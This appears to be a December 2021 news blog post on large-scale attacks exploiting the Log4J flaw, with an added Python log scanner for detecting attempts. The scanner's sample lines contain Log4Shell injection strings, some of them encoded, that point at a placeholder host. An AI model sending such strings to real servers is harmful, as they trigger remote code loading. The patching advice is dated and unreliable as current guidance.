More than 840,000 attacks have been launched to try to exploit the Log4J flaw

We recently commented on the Log4J flaw, and in this post we would like to share information from researchers, who claim that attackers, including groups backed by the Chinese state but also by Russia, have launched more than 840,000 attacks against companies around the world since last Friday through this vulnerability.

The cybersecurity group Check Point said that attacks related to the vulnerability had accelerated in the 72 hours since Friday, and that at times its researchers were seeing more than 100 attacks per minute.

The vendor also noted great creativity in adapting the attack. At times more than 60 new variations appear in less than 24 hours, introducing new obfuscation or encoding techniques.

"Chinese government attackers" are mentioned as being involved, according to Charles Carmakal, chief technology officer of the cyber company Mandiant.

The Log4J flaw allows attackers to take remote control of computers running Java applications.

Jen Easterly, director of the United States Cybersecurity and Infrastructure Security Agency (CISA), told industry executives that the vulnerability was "one of the most serious I've seen in my entire career, if not the most serious," according to American media. Hundreds of millions of devices are likely to be affected, she said.

Check Point said that in many cases the attackers take over computers and use them to mine cryptocurrencies or to become part of botnets, vast computer networks that can be used to overwhelm website traffic, send spam, or serve other illegal purposes.

For Kaspersky, most of the attacks come from Russia.

CISA and the UK's National Cyber Security Centre have issued alerts urging organizations to make updates related to the Log4J vulnerability, as experts try to assess the consequences.

Amazon, Apple, IBM, Microsoft, and Cisco are among those rushing to roll out fixes, but no serious breach has been publicly reported so far.

The vulnerability is the latest to affect corporate networks, after vulnerabilities emerged over the past year in commonly used software from Microsoft and the IT company SolarWinds. Both vulnerabilities were reportedly first exploited by state-backed espionage groups from China and Russia, respectively.

Mandiant's Carmakal said that Chinese state-backed actors are trying to exploit the Log4J bug, but declined to share further details. SentinelOne researchers told the media that they had observed Chinese hackers taking advantage of the vulnerability.

CERT-FR recommends a thorough analysis of network logs. The following patterns can be used to identify an attempt to exploit this vulnerability when it is used in URLs or in certain HTTP headers such as the user-agent.
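
One way to run this kind of log review over web server access logs, as an added example that is not from CERT-FR or the original article. It assumes Combined Log Format and uses the JNDI lookup prefix as the marker (an assumption, the article's own pattern list is not reproduced); the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: the JNDI lookup prefix is the marker searched for.
MARKER = "${jndi:"

# Combined Log Format: host ident user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def normalise(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding, then lower-case."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()

def scan(lines):
    """Return (line_number, client_host, field) for each field carrying the marker."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LINE_RE.match(line.strip())
        if match is None:
            continue  # not Combined Log Format; skipped in this example
        for field in ("request", "referer", "agent"):
            if MARKER in normalise(match.group(field)):
                hits.append((number, match.group("host"), field))
    return hits

# Constructed sample lines (documentation IP ranges, .invalid hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://test.invalid/a}"',
    '203.0.113.4 - - [13/Dec/2021:10:01:09 +0000] "GET /?q=$%7BJNDI:ldap://test.invalid/a%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.4 - - [13/Dec/2021:10:01:12 +0000] "GET /?q=%2524%257Bjndi:dns://test.invalid%257D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check covers percent-encoding and letter case only; a hit shows that a request carried the marker, not that the server behind it was vulnerable or compromised.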

It is strongly recommended to use log4j version 2.15.0 as soon as possible. However, in case of difficulty migrating to this version, the following workaround can be applied temporarily:
For applications that use versions 2.7.0 and later of the log4j library, it is possible to protect against any attack by modifying the format of the events to be logged with the syntax %m{nolookups} for the data that would be supplied by the user.

Almost half of all attacks were carried out by known cyber attackers, according to Check Point. These include groups using Tsunami and Mirai, malware that turns devices into botnets, or networks used to launch remotely controlled attacks, such as denial-of-service attacks. It also included groups using XMRig, software that mines the Monero digital currency.

"With this vulnerability, attackers gain unlimited power: they can extract confidential data, upload files to the server, delete data, install ransomware or pivot to other servers," said Nicholas Sciberras, chief engineering officer at Acunetix, a vulnerability scanner. It was "surprisingly easy" to carry out an attack, he said, adding that the flaw "will be exploited in the coming months."

